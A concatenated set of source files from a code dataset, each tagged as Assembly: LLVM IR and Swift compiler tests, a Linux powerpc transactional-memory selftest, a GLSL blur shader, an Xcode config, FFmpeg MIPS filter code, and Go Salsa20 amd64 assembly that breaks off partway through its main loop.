; CHECK: {{.*}}DW_TAG_formal_parameter
; CHECK-NEXT: DW_AT_location [DW_FORM_block1] (DW_OP_fbreg +8, DW_OP_constu 0x1, DW_OP_swap, DW_OP_xderef)
; CHECK-NEXT: DW_AT_name {{.*}}"ArgA"
i32 addrspace(1)* %ArgA,
; CHECK: {{.*}}DW_TAG_formal_parameter
; CHECK-NEXT: DW_AT_location [DW_FORM_block1] (DW_OP_fbreg +16, DW_OP_constu 0x1, DW_OP_swap, DW_OP_xderef)
; CHECK-NEXT: DW_AT_name {{.*}}"ArgB"
i32 addrspace(1)* %ArgB) !dbg !13 {
entry:
%ArgN.addr = alloca i32, align 4
%ArgA.addr = alloca i32 addrspace(1)*, align 4
%ArgB.addr = alloca i32 addrspace(1)*, align 4
store i32 %ArgN, i32* %ArgN.addr, align 4
call void @llvm.dbg.declare(metadata i32* %ArgN.addr, metadata !22, metadata !23), !dbg !24
store i32 addrspace(1)* %ArgA, i32 addrspace(1)** %ArgA.addr, align 4
call void @llvm.dbg.declare(metadata i32 addrspace(1)** %ArgA.addr, metadata !25, metadata !23), !dbg !26
store i32 addrspace(1)* %ArgB, i32 addrspace(1)** %ArgB.addr, align 4
call void @llvm.dbg.declare(metadata i32 addrspace(1)** %ArgB.addr, metadata !27, metadata !23), !dbg !28
%0 = load i32 addrspace(1)*, i32 addrspace(1)** %ArgB.addr, align 4, !dbg !29
%1 = load i32, i32* %ArgN.addr, align 4, !dbg !30
%idxprom = zext i32 %1 to i64, !dbg !29
%arrayidx = getelementptr inbounds i32, i32 addrspace(1)* %0, i64 %idxprom, !dbg !29
%2 = load i32, i32 addrspace(1)* %arrayidx, align 4, !dbg !29
%3 = load i32 addrspace(1)*, i32 addrspace(1)** %ArgA.addr, align 4, !dbg !31
%4 = load i32, i32* %ArgN.addr, align 4, !dbg !32
%idxprom1 = zext i32 %4 to i64, !dbg !31
%arrayidx2 = getelementptr inbounds i32, i32 addrspace(1)* %3, i64 %idxprom1, !dbg !31
%5 = load i32, i32 addrspace(1)* %arrayidx2, align 4, !dbg !33
%add = add nsw i32 %5, %2, !dbg !33
store i32 %add, i32 addrspace(1)* %arrayidx2, align 4, !dbg !33
ret void, !dbg !34
}
!llvm.dbg.cu = !{!2}
!opencl.ocl.version = !{!9}
!llvm.module.flags = !{!10, !11}
!llvm.ident = !{!12}
!0 = !DIGlobalVariableExpression(var: !1, expr: !DIExpression())
!1 = distinct !DIGlobalVariable(name: "GlobA", scope: !2, file: !3, line: 1, type: !8, isLocal: false, isDefinition: true)
!2 = distinct !DICompileUnit(language: DW_LANG_C99, file: !3, producer: "clang version 5.0.0", isOptimized: false, runtimeVersion: 0, emissionKind: FullDebug, enums: !4, globals: !5)
!3 = !DIFile(filename: "variable-locations.cl", directory: "/some/random/directory")
!4 = !{}
!5 = !{!0, !6}
!6 = !DIGlobalVariableExpression(var: !7, expr: !DIExpression())
!7 = distinct !DIGlobalVariable(name: "GlobB", scope: !2, file: !3, line: 2, type: !8, isLocal: false, isDefinition: true)
!8 = !DIBasicType(name: "int", size: 32, encoding: DW_ATE_signed)
!9 = !{i32 2, i32 0}
!10 = !{i32 2, !"Dwarf Version", i32 2}
!11 = !{i32 2, !"Debug Info Version", i32 3}
!12 = !{!"clang version 5.0.0"}
!13 = distinct !DISubprogram(name: "kernel1", scope: !3, file: !3, line: 4, type: !14, isLocal: false, isDefinition: true, scopeLine: 4, flags: DIFlagPrototyped, isOptimized: false, unit: !2, variables: !4)
!14 = !DISubroutineType(types: !15)
!15 = !{null, !16, !17, !17}
!16 = !DIBasicType(name: "unsigned int", size: 32, encoding: DW_ATE_unsigned)
!17 = !DIDerivedType(tag: DW_TAG_pointer_type, baseType: !8, size: 64)
!18 = !{i32 0, i32 1, i32 1}
!19 = !{!"none", !"none", !"none"}
!20 = !{!"uint", !"int*", !"int*"}
!21 = !{!"", !"", !""}
!22 = !DILocalVariable(name: "ArgN", arg: 1, scope: !13, file: !3, line: 4, type: !16)
!23 = !DIExpression(DW_OP_constu, 1, DW_OP_swap, DW_OP_xderef)
!24 = !DILocation(line: 4, column: 34, scope: !13)
!25 = !DILocalVariable(name: "ArgA", arg: 2, scope: !13, file: !3, line: 4, type: !17)
!26 = !DILocation(line: 4, column: 52, scope: !13)
!27 = !DILocalVariable(name: "ArgB", arg: 3, scope: !13, file: !3, line: 4, type: !17)
!28 = !DILocation(line: 4, column: 70, scope: !13)
!29 = !DILocation(line: 5, column: 17, scope: !13)
!30 = !DILocation(line: 5, column: 22, scope: !13)
!31 = !DILocation(line: 5, column: 3, scope: !13)
!32 = !DILocation(line: 5, column: 8, scope: !13)
!33 = !DILocation(line: 5, column: 14, scope: !13)
!34 = !DILocation(line: 6, column: 1, scope: !13)
| {
"language": "Assembly"
} |
/* SPDX-License-Identifier: GPL-2.0-or-later */
/*
* Copyright 2015, Cyril Bur, IBM Corp.
*/
#include "basic_asm.h"
#include "gpr_asm.h"
#include "fpu_asm.h"
#include "vmx_asm.h"
#include "vsx_asm.h"
/*
* Large caveat here being that the caller cannot expect the
* signal to always be sent! The hardware can (AND WILL!) abort
* the transaction between the tbegin and the tsuspend (however
* unlikely it seems or infrequently it actually happens).
* You have been warned.
*/
/* long tm_signal_self(pid_t pid, long *gprs, double *fps, vector *vms, vector *vss); */
FUNC_START(tm_signal_self_context_load)
PUSH_BASIC_STACK(512)
/*
* Don't strictly need to save and restore as it depends on if
* we're going to use them, however this reduces messy logic
*/
PUSH_VMX(STACK_FRAME_LOCAL(5,0),r8)
PUSH_FPU(512)
PUSH_NVREGS_BELOW_FPU(512)
std r3, STACK_FRAME_PARAM(0)(sp) /* pid */
std r4, STACK_FRAME_PARAM(1)(sp) /* gps */
std r5, STACK_FRAME_PARAM(2)(sp) /* fps */
std r6, STACK_FRAME_PARAM(3)(sp) /* vms */
std r7, STACK_FRAME_PARAM(4)(sp) /* vss */
ld r3, STACK_FRAME_PARAM(1)(sp)
cmpdi r3, 0
beq skip_gpr_lc
bl load_gpr
skip_gpr_lc:
ld r3, STACK_FRAME_PARAM(2)(sp)
cmpdi r3, 0
beq skip_fpu_lc
bl load_fpu
skip_fpu_lc:
ld r3, STACK_FRAME_PARAM(3)(sp)
cmpdi r3, 0
beq skip_vmx_lc
bl load_vmx
skip_vmx_lc:
ld r3, STACK_FRAME_PARAM(4)(sp)
cmpdi r3, 0
beq skip_vsx_lc
bl load_vsx
skip_vsx_lc:
/*
* Set r3 (return value) before tbegin. Use the pid as a known
* 'all good' return value, zero is used to indicate a non-doomed
* transaction.
*/
ld r3, STACK_FRAME_PARAM(0)(sp)
tbegin.
beq 1f
tsuspend. /* Can't enter a syscall transactionally */
ld r3, STACK_FRAME_PARAM(1)(sp)
cmpdi r3, 0
beq skip_gpr_lt
/* Get the second half of the array */
addi r3, r3, 8 * 18
bl load_gpr
skip_gpr_lt:
ld r3, STACK_FRAME_PARAM(2)(sp)
cmpdi r3, 0
beq skip_fpu_lt
/* Get the second half of the array */
addi r3, r3, 8 * 18
bl load_fpu
skip_fpu_lt:
ld r3, STACK_FRAME_PARAM(3)(sp)
cmpdi r3, 0
beq skip_vmx_lt
/* Get the second half of the array */
addi r3, r3, 16 * 12
bl load_vmx
skip_vmx_lt:
ld r3, STACK_FRAME_PARAM(4)(sp)
cmpdi r3, 0
beq skip_vsx_lt
/* Get the second half of the array */
addi r3, r3, 16 * 12
bl load_vsx
skip_vsx_lt:
li r0, 37 /* sys_kill */
ld r3, STACK_FRAME_PARAM(0)(sp) /* pid */
li r4, 10 /* SIGUSR1 */
sc /* Taking the signal will doom the transaction */
tabort. 0
tresume. /* Be super sure we abort */
/*
* This will cause us to resume doomed transaction and cause
* hardware to cleanup, we'll end up at 1: anything between
* tresume. and 1: shouldn't ever run.
*/
li r3, 0
1:
POP_VMX(STACK_FRAME_LOCAL(5,0),r4)
POP_FPU(512)
POP_NVREGS_BELOW_FPU(512)
POP_BASIC_STACK(512)
blr
FUNC_END(tm_signal_self_context_load)
| {
"language": "Assembly"
} |
#ifndef MUD_SHADER_BLUR
#define MUD_SHADER_BLUR
vec4 blur_7(sampler2D tex, vec2 uv, float lod, float k0, float k1, float k2, float k3, float k4, float k5, float k6)
{
vec2 pixel_size = u_pixel_size * u_source_crop.zw;
vec4 color = texture2DLod(tex, uv + vec2( 0.0, 0.0) * pixel_size, lod) * k0;
color += texture2DLod(tex, uv + vec2( 1.0, 0.0) * pixel_size, lod) * k1;
color += texture2DLod(tex, uv + vec2( 2.0, 0.0) * pixel_size, lod) * k2;
color += texture2DLod(tex, uv + vec2( 3.0, 0.0) * pixel_size, lod) * k3;
color += texture2DLod(tex, uv + vec2(-1.0, 0.0) * pixel_size, lod) * k4;
color += texture2DLod(tex, uv + vec2(-2.0, 0.0) * pixel_size, lod) * k5;
color += texture2DLod(tex, uv + vec2(-3.0, 0.0) * pixel_size, lod) * k6;
return color;
}
vec4 blur_5(sampler2D tex, vec2 uv, float lod, float k0, float k1, float k2, float k3, float k4)
{
vec2 pixel_size = u_pixel_size * u_source_crop.zw;
vec4 color = texture2DLod(tex, uv + vec2( 0.0, 0.0) * pixel_size, lod) * k0;
color += texture2DLod(tex, uv + vec2( 0.0, 1.0) * pixel_size, lod) * k1;
color += texture2DLod(tex, uv + vec2( 0.0, 2.0) * pixel_size, lod) * k2;
color += texture2DLod(tex, uv + vec2( 0.0, -1.0) * pixel_size, lod) * k3;
color += texture2DLod(tex, uv + vec2( 0.0, -2.0) * pixel_size, lod) * k4;
return color;
}
#endif
| {
"language": "Assembly"
} |
@ RUN: llvm-mc < %s -triple thumbv5-linux-gnueabi -filetype=obj -o - \
@ RUN: | llvm-readobj -r | FileCheck %s
.syntax unified
.text
.align 2
.globl main
.type main,%function
.thumb_func
main:
bl end
.space 8192
end:
bl main2
bx lr
.text
.align 2
.globl main2
.type main2,%function
.thumb_func
main2:
bx lr
@ CHECK-NOT: 0x0 R_ARM_THM_CALL end 0x0
@ CHECK: 0x2004 R_ARM_THM_CALL main2 0x0
| {
"language": "Assembly"
} |
; RUN: llvm-as < %s | llvm-dis | grep "align 1024"
; RUN: verify-uselistorder %s
define void @test(i32* %arg) {
entry:
store i32 0, i32* %arg, align 1024
ret void
}
| {
"language": "Assembly"
} |
//
// StaticLibraryTarget.xcconfig
//
// These are static library target settings for libgtest.a. It
// is set in the "Based On:" dropdown in the "Target" info dialog.
// This file is based on the Xcode Configuration files in:
// http://code.google.com/p/google-toolbox-for-mac/
//
// Static libs can be included in bundles so make them position independent
GCC_DYNAMIC_NO_PIC = NO
// Static libs should not have their internal globals or external symbols
// stripped.
STRIP_STYLE = debugging
// Let the user install by specifying the $DSTROOT with xcodebuild
SKIP_INSTALL = NO
| {
"language": "Assembly"
} |
// RUN: %target-swift-frontend -dump-parse %s 2>&1 | %FileCheck %s
// CR
_ = """
"""
//CHECK: string_literal_expr {{.*}} value=""
_ = """
test
"""
//CHECK: string_literal_expr {{.*}} value="test"
// CR+LF
_ = """
"""
//CHECK: string_literal_expr {{.*}} value=""
_ = """
test
"""
//CHECK: string_literal_expr {{.*}} value="test"
// CR+LF
_ = """
"""
//CHECK: string_literal_expr {{.*}} value=""
_ = """
test
test
"""
//CHECK: string_literal_expr {{.*}} value="test\ntest"
// LF+CR
_ = """
foo
foo
"""
//CHECK: string_literal_expr {{.*}} value="\nfoo\n\nfoo\n"
// LF+CR+LF
_ = """
foo
foo
"""
//CHECK: string_literal_expr {{.*}} value="\nfoo\n\nfoo\n"
// Mixed no-indent.
_ = """
<LF
<LF
<CR
<CR+LF
"""
//CHECK: string_literal_expr {{.*}} value="<LF\n<LF\n<CR\n<CR+LF"
// Mixed indent.
_ = """
<LF
<LF
<CR
<CR+LF
"""
//CHECK: string_literal_expr {{.*}} value="<LF\n<LF\n<CR\n<CR+LF"
// Empty line CR, CR+LF, LF.
_ = """
foo
bar
"""
//CHECK: string_literal_expr {{.*}} value="foo\n\n\n\nbar"
| {
"language": "Assembly"
} |
/*
* Copyright (c) 2012
* MIPS Technologies, Inc., California.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. Neither the name of the MIPS Technologies, Inc., nor the names of its
* contributors may be used to endorse or promote products derived from
* this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE MIPS TECHNOLOGIES, INC. ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE MIPS TECHNOLOGIES, INC. BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* Author: Nedeljko Babic (nbabic@mips.com)
*
* various filters for ACELP-based codecs optimized for MIPS
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
/**
* @file
* Reference: libavcodec/acelp_filters.c
*/
#include "config.h"
#include "libavutil/attributes.h"
#include "libavcodec/acelp_filters.h"
#include "libavutil/mips/asmdefs.h"
#if HAVE_INLINE_ASM
#if !HAVE_MIPS32R6 && !HAVE_MIPS64R6
static void ff_acelp_interpolatef_mips(float *out, const float *in,
const float *filter_coeffs, int precision,
int frac_pos, int filter_length, int length)
{
int n, i;
int prec = precision * 4;
int fc_offset = precision - frac_pos;
float in_val_p, in_val_m, fc_val_p, fc_val_m;
for (n = 0; n < length; n++) {
/**
* four pointers are defined in order to minimize number of
* computations done in inner loop
*/
const float *p_in_p = &in[n];
const float *p_in_m = &in[n-1];
const float *p_filter_coeffs_p = &filter_coeffs[frac_pos];
const float *p_filter_coeffs_m = filter_coeffs + fc_offset;
float v = 0;
for (i = 0; i < filter_length;i++) {
__asm__ volatile (
"lwc1 %[in_val_p], 0(%[p_in_p]) \n\t"
"lwc1 %[fc_val_p], 0(%[p_filter_coeffs_p]) \n\t"
"lwc1 %[in_val_m], 0(%[p_in_m]) \n\t"
"lwc1 %[fc_val_m], 0(%[p_filter_coeffs_m]) \n\t"
PTR_ADDIU "%[p_in_p], %[p_in_p], 4 \n\t"
"madd.s %[v],%[v], %[in_val_p],%[fc_val_p] \n\t"
PTR_ADDIU "%[p_in_m], %[p_in_m], -4 \n\t"
PTR_ADDU "%[p_filter_coeffs_p],%[p_filter_coeffs_p], %[prec] \n\t"
PTR_ADDU "%[p_filter_coeffs_m],%[p_filter_coeffs_m], %[prec] \n\t"
"madd.s %[v],%[v],%[in_val_m], %[fc_val_m] \n\t"
: [v] "+&f" (v),[p_in_p] "+r" (p_in_p), [p_in_m] "+r" (p_in_m),
[p_filter_coeffs_p] "+r" (p_filter_coeffs_p),
[in_val_p] "=&f" (in_val_p), [in_val_m] "=&f" (in_val_m),
[fc_val_p] "=&f" (fc_val_p), [fc_val_m] "=&f" (fc_val_m),
[p_filter_coeffs_m] "+r" (p_filter_coeffs_m)
: [prec] "r" (prec)
: "memory"
);
}
out[n] = v;
}
}
static void ff_acelp_apply_order_2_transfer_function_mips(float *out, const float *in,
const float zero_coeffs[2],
const float pole_coeffs[2],
float gain, float mem[2], int n)
{
/**
* loop is unrolled eight times
*/
__asm__ volatile (
"lwc1 $f0, 0(%[mem]) \n\t"
"blez %[n], ff_acelp_apply_order_2_transfer_function_end%= \n\t"
"lwc1 $f1, 4(%[mem]) \n\t"
"lwc1 $f2, 0(%[pole_coeffs]) \n\t"
"lwc1 $f3, 4(%[pole_coeffs]) \n\t"
"lwc1 $f4, 0(%[zero_coeffs]) \n\t"
"lwc1 $f5, 4(%[zero_coeffs]) \n\t"
"ff_acelp_apply_order_2_transfer_function_madd%=: \n\t"
"lwc1 $f6, 0(%[in]) \n\t"
"mul.s $f9, $f3, $f1 \n\t"
"mul.s $f7, $f2, $f0 \n\t"
"msub.s $f7, $f7, %[gain], $f6 \n\t"
"sub.s $f7, $f7, $f9 \n\t"
"madd.s $f8, $f7, $f4, $f0 \n\t"
"madd.s $f8, $f8, $f5, $f1 \n\t"
"lwc1 $f11, 4(%[in]) \n\t"
"mul.s $f12, $f3, $f0 \n\t"
"mul.s $f13, $f2, $f7 \n\t"
"msub.s $f13, $f13, %[gain], $f11 \n\t"
"sub.s $f13, $f13, $f12 \n\t"
"madd.s $f14, $f13, $f4, $f7 \n\t"
"madd.s $f14, $f14, $f5, $f0 \n\t"
"swc1 $f8, 0(%[out]) \n\t"
"lwc1 $f6, 8(%[in]) \n\t"
"mul.s $f9, $f3, $f7 \n\t"
"mul.s $f15, $f2, $f13 \n\t"
"msub.s $f15, $f15, %[gain], $f6 \n\t"
"sub.s $f15, $f15, $f9 \n\t"
"madd.s $f8, $f15, $f4, $f13 \n\t"
"madd.s $f8, $f8, $f5, $f7 \n\t"
"swc1 $f14, 4(%[out]) \n\t"
"lwc1 $f11, 12(%[in]) \n\t"
"mul.s $f12, $f3, $f13 \n\t"
"mul.s $f16, $f2, $f15 \n\t"
"msub.s $f16, $f16, %[gain], $f11 \n\t"
"sub.s $f16, $f16, $f12 \n\t"
"madd.s $f14, $f16, $f4, $f15 \n\t"
"madd.s $f14, $f14, $f5, $f13 \n\t"
"swc1 $f8, 8(%[out]) \n\t"
"lwc1 $f6, 16(%[in]) \n\t"
"mul.s $f9, $f3, $f15 \n\t"
"mul.s $f7, $f2, $f16 \n\t"
"msub.s $f7, $f7, %[gain], $f6 \n\t"
"sub.s $f7, $f7, $f9 \n\t"
"madd.s $f8, $f7, $f4, $f16 \n\t"
"madd.s $f8, $f8, $f5, $f15 \n\t"
"swc1 $f14, 12(%[out]) \n\t"
"lwc1 $f11, 20(%[in]) \n\t"
"mul.s $f12, $f3, $f16 \n\t"
"mul.s $f13, $f2, $f7 \n\t"
"msub.s $f13, $f13, %[gain], $f11 \n\t"
"sub.s $f13, $f13, $f12 \n\t"
"madd.s $f14, $f13, $f4, $f7 \n\t"
"madd.s $f14, $f14, $f5, $f16 \n\t"
"swc1 $f8, 16(%[out]) \n\t"
"lwc1 $f6, 24(%[in]) \n\t"
"mul.s $f9, $f3, $f7 \n\t"
"mul.s $f15, $f2, $f13 \n\t"
"msub.s $f15, $f15, %[gain], $f6 \n\t"
"sub.s $f1, $f15, $f9 \n\t"
"madd.s $f8, $f1, $f4, $f13 \n\t"
"madd.s $f8, $f8, $f5, $f7 \n\t"
"swc1 $f14, 20(%[out]) \n\t"
"lwc1 $f11, 28(%[in]) \n\t"
"mul.s $f12, $f3, $f13 \n\t"
"mul.s $f16, $f2, $f1 \n\t"
"msub.s $f16, $f16, %[gain], $f11 \n\t"
"sub.s $f0, $f16, $f12 \n\t"
"madd.s $f14, $f0, $f4, $f1 \n\t"
"madd.s $f14, $f14, $f5, $f13 \n\t"
"swc1 $f8, 24(%[out]) \n\t"
PTR_ADDIU "%[out], 32 \n\t"
PTR_ADDIU "%[in], 32 \n\t"
"addiu %[n], -8 \n\t"
"swc1 $f14, -4(%[out]) \n\t"
"bnez %[n], ff_acelp_apply_order_2_transfer_function_madd%= \n\t"
"swc1 $f1, 4(%[mem]) \n\t"
"swc1 $f0, 0(%[mem]) \n\t"
"ff_acelp_apply_order_2_transfer_function_end%=: \n\t"
: [out] "+r" (out),
[in] "+r" (in), [gain] "+f" (gain),
[n] "+r" (n), [mem] "+r" (mem)
: [zero_coeffs] "r" (zero_coeffs),
[pole_coeffs] "r" (pole_coeffs)
: "$f0", "$f1", "$f2", "$f3", "$f4", "$f5",
"$f6", "$f7", "$f8", "$f9", "$f10", "$f11",
"$f12", "$f13", "$f14", "$f15", "$f16", "memory"
);
}
#endif /* !HAVE_MIPS32R6 && !HAVE_MIPS64R6 */
#endif /* HAVE_INLINE_ASM */
void ff_acelp_filter_init_mips(ACELPFContext *c)
{
#if HAVE_INLINE_ASM
#if !HAVE_MIPS32R6 && !HAVE_MIPS64R6
c->acelp_interpolatef = ff_acelp_interpolatef_mips;
c->acelp_apply_order_2_transfer_function = ff_acelp_apply_order_2_transfer_function_mips;
#endif
#endif
}
| {
"language": "Assembly"
} |
// Copyright 2012 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build amd64,!appengine,!gccgo
// This code was translated into a form compatible with 6a from the public
// domain sources in SUPERCOP: https://bench.cr.yp.to/supercop.html
// func salsa2020XORKeyStream(out, in *byte, n uint64, nonce, key *byte)
// This needs up to 64 bytes at 360(SP); hence the non-obvious frame size.
TEXT ·salsa2020XORKeyStream(SB),0,$456-40 // frame = 424 + 32 byte alignment
MOVQ out+0(FP),DI
MOVQ in+8(FP),SI
MOVQ n+16(FP),DX
MOVQ nonce+24(FP),CX
MOVQ key+32(FP),R8
MOVQ SP,R12
MOVQ SP,R9
ADDQ $31, R9
ANDQ $~31, R9
MOVQ R9, SP
MOVQ DX,R9
MOVQ CX,DX
MOVQ R8,R10
CMPQ R9,$0
JBE DONE
START:
MOVL 20(R10),CX
MOVL 0(R10),R8
MOVL 0(DX),AX
MOVL 16(R10),R11
MOVL CX,0(SP)
MOVL R8, 4 (SP)
MOVL AX, 8 (SP)
MOVL R11, 12 (SP)
MOVL 8(DX),CX
MOVL 24(R10),R8
MOVL 4(R10),AX
MOVL 4(DX),R11
MOVL CX,16(SP)
MOVL R8, 20 (SP)
MOVL AX, 24 (SP)
MOVL R11, 28 (SP)
MOVL 12(DX),CX
MOVL 12(R10),DX
MOVL 28(R10),R8
MOVL 8(R10),AX
MOVL DX,32(SP)
MOVL CX, 36 (SP)
MOVL R8, 40 (SP)
MOVL AX, 44 (SP)
MOVQ $1634760805,DX
MOVQ $857760878,CX
MOVQ $2036477234,R8
MOVQ $1797285236,AX
MOVL DX,48(SP)
MOVL CX, 52 (SP)
MOVL R8, 56 (SP)
MOVL AX, 60 (SP)
CMPQ R9,$256
JB BYTESBETWEEN1AND255
MOVOA 48(SP),X0
PSHUFL $0X55,X0,X1
PSHUFL $0XAA,X0,X2
PSHUFL $0XFF,X0,X3
PSHUFL $0X00,X0,X0
MOVOA X1,64(SP)
MOVOA X2,80(SP)
MOVOA X3,96(SP)
MOVOA X0,112(SP)
MOVOA 0(SP),X0
PSHUFL $0XAA,X0,X1
PSHUFL $0XFF,X0,X2
PSHUFL $0X00,X0,X3
PSHUFL $0X55,X0,X0
MOVOA X1,128(SP)
MOVOA X2,144(SP)
MOVOA X3,160(SP)
MOVOA X0,176(SP)
MOVOA 16(SP),X0
PSHUFL $0XFF,X0,X1
PSHUFL $0X55,X0,X2
PSHUFL $0XAA,X0,X0
MOVOA X1,192(SP)
MOVOA X2,208(SP)
MOVOA X0,224(SP)
MOVOA 32(SP),X0
PSHUFL $0X00,X0,X1
PSHUFL $0XAA,X0,X2
PSHUFL $0XFF,X0,X0
MOVOA X1,240(SP)
MOVOA X2,256(SP)
MOVOA X0,272(SP)
BYTESATLEAST256:
MOVL 16(SP),DX
MOVL 36 (SP),CX
MOVL DX,288(SP)
MOVL CX,304(SP)
ADDQ $1,DX
SHLQ $32,CX
ADDQ CX,DX
MOVQ DX,CX
SHRQ $32,CX
MOVL DX, 292 (SP)
MOVL CX, 308 (SP)
ADDQ $1,DX
SHLQ $32,CX
ADDQ CX,DX
MOVQ DX,CX
SHRQ $32,CX
MOVL DX, 296 (SP)
MOVL CX, 312 (SP)
ADDQ $1,DX
SHLQ $32,CX
ADDQ CX,DX
MOVQ DX,CX
SHRQ $32,CX
MOVL DX, 300 (SP)
MOVL CX, 316 (SP)
ADDQ $1,DX
SHLQ $32,CX
ADDQ CX,DX
MOVQ DX,CX
SHRQ $32,CX
MOVL DX,16(SP)
MOVL CX, 36 (SP)
MOVQ R9,352(SP)
MOVQ $20,DX
MOVOA 64(SP),X0
MOVOA 80(SP),X1
MOVOA 96(SP),X2
MOVOA 256(SP),X3
MOVOA 272(SP),X4
MOVOA 128(SP),X5
MOVOA 144(SP),X6
MOVOA 176(SP),X7
MOVOA 192(SP),X8
MOVOA 208(SP),X9
MOVOA 224(SP),X10
MOVOA 304(SP),X11
MOVOA 112(SP),X12
MOVOA 160(SP),X13
MOVOA 240(SP),X14
MOVOA 288(SP),X15
MAINLOOP1:
MOVOA X1,320(SP)
MOVOA X2,336(SP)
MOVOA X13,X1
PADDL X12,X1
MOVOA X1,X2
PSLLL $7,X1
PXOR X1,X14
PSRLL $25,X2
PXOR X2,X14
MOVOA X7,X1
PADDL X0,X1
MOVOA X1,X2
PSLLL $7,X1
PXOR X1,X11
PSRLL $25,X2
PXOR X2,X11
MOVOA X12,X1
PADDL X14,X1
MOVOA X1,X2
PSLLL $9,X1
PXOR X1,X15
PSRLL $23,X2
PXOR X2,X15
MOVOA X0,X1
PADDL X11,X1
MOVOA X1,X2
PSLLL $9,X1
PXOR X1,X9
PSRLL $23,X2
PXOR X2,X9
MOVOA X14,X1
PADDL X15,X1
MOVOA X1,X2
PSLLL $13,X1
PXOR X1,X13
PSRLL $19,X2
PXOR X2,X13
MOVOA X11,X1
PADDL X9,X1
MOVOA X1,X2
PSLLL $13,X1
PXOR X1,X7
PSRLL $19,X2
PXOR X2,X7
MOVOA X15,X1
PADDL X13,X1
MOVOA X1,X2
PSLLL $18,X1
PXOR X1,X12
PSRLL $14,X2
PXOR X2,X12
MOVOA 320(SP),X1
MOVOA X12,320(SP)
MOVOA X9,X2
PADDL X7,X2
MOVOA X2,X12
PSLLL $18,X2
PXOR X2,X0
PSRLL $14,X12
PXOR X12,X0
MOVOA X5,X2
PADDL X1,X2
MOVOA X2,X12
PSLLL $7,X2
PXOR X2,X3
PSRLL $25,X12
PXOR X12,X3
MOVOA 336(SP),X2
MOVOA X0,336(SP)
MOVOA X6,X0
PADDL X2,X0
MOVOA X0,X12
PSLLL $7,X0
PXOR X0,X4
PSRLL $25,X12
PXOR X12,X4
MOVOA X1,X0
PADDL X3,X0
MOVOA X0,X12
PSLLL $9,X0
PXOR X0,X10
PSRLL $23,X12
PXOR X12,X10
MOVOA X2,X0
PADDL X4,X0
MOVOA X0,X12
PSLLL $9,X0
PXOR X0,X8
PSRLL $23,X12
PXOR X12,X8
MOVOA X3,X0
PADDL X10,X0
MOVOA X0,X12
PSLLL $13,X0
PXOR X0,X5
PSRLL $19,X12
PXOR X12,X5
MOVOA X4,X0
PADDL X8,X0
MOVOA X0,X12
PSLLL $13,X0
PXOR X0,X6
PSRLL $19,X12
PXOR X12,X6
MOVOA X10,X0
PADDL X5,X0
MOVOA X0,X12
PSLLL $18,X0
PXOR X0,X1
PSRLL $14,X12
PXOR X12,X1
MOVOA 320(SP),X0
MOVOA X1,320(SP)
MOVOA X4,X1
PADDL X0,X1
MOVOA X1,X12
PSLLL $7,X1
PXOR X1,X7
PSRLL $25,X12
PXOR X12,X7
MOVOA X8,X1
PADDL X6,X1
MOVOA X1,X12
PSLLL $18,X1
PXOR X1,X2
PSRLL $14,X12
PXOR X12,X2
MOVOA 336(SP),X12
MOVOA X2,336(SP)
MOVOA X14,X1
PADDL X12,X1
MOVOA X1,X2
PSLLL $7,X1
PXOR X1,X5
PSRLL $25,X2
PXOR X2,X5
MOVOA X0,X1
PADDL X7,X1
MOVOA X1,X2
PSLLL $9,X1
PXOR X1,X10
PSRLL $23,X2
PXOR X2,X10
MOVOA X12,X1
PADDL X5,X1
MOVOA X1,X2
PSLLL $9,X1
PXOR X1,X8
PSRLL $23,X2
PXOR X2,X8
MOVOA X7,X1
PADDL X10,X1
MOVOA X1,X2
PSLLL $13,X1
PXOR X1,X4
PSRLL $19,X2
PXOR X2,X4
MOVOA X5,X1
PADDL X8,X1
MOVOA X1,X2
PSLLL $13,X1
PXOR X1,X14
PSRLL $19,X2
PXOR X2,X14
MOVOA X10,X1
PADDL X4,X1
MOVOA X1,X2
PSLLL $18,X1
PXOR X1,X0
PSRLL $14,X2
PXOR X2,X0
MOVOA 320(SP),X1
MOVOA X0,320(SP)
MOVOA X8,X0
PADDL X14,X0
MOVOA X0,X2
PSLLL $18,X0
PXOR X0,X12
PSRLL $14,X2
PXOR X2,X12
MOVOA X11,X0
PADDL X1,X0
MOVOA X0,X2
PSLLL $7,X0
PXOR X0,X6
PSRLL $25,X2
PXOR X2,X6
MOVOA 336(SP),X2
MOVOA X12,336(SP)
MOVOA X3,X0
PADDL X2,X0
MOVOA X0,X12
PSLLL $7,X0
PXOR X0,X13
PSRLL $25,X12
PXOR X12,X13
MOVOA X1,X0
PADDL X6,X0
MOVOA X0,X12
PSLLL $9,X0
PXOR X0,X15
